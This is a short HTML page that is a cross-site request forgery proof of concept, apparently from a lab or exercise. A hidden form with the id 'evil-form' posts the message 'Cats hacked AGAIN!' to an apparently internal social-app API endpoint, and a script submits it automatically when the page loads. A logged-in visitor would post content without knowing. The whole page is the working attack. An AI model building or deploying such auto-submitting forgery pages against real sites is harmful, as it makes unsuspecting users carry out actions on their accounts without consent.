<!doctype html>
<html>
    <head>
        <title>LMAO</title>
        <link rel="stylesheet" href="style.css" />
    </head>
    <body>
        <form action="http://izanami/asocial/api/post" method="POST" id="evil-form">
            <input type="hidden" name="testo" value="Cats hacked AGAIN! (^._.^)!" />
            <input type="submit" value="More cats!" />
        </form>
        <script>
            document.getElementById('evil-form').submit();
        </script>
    </body>
</html>
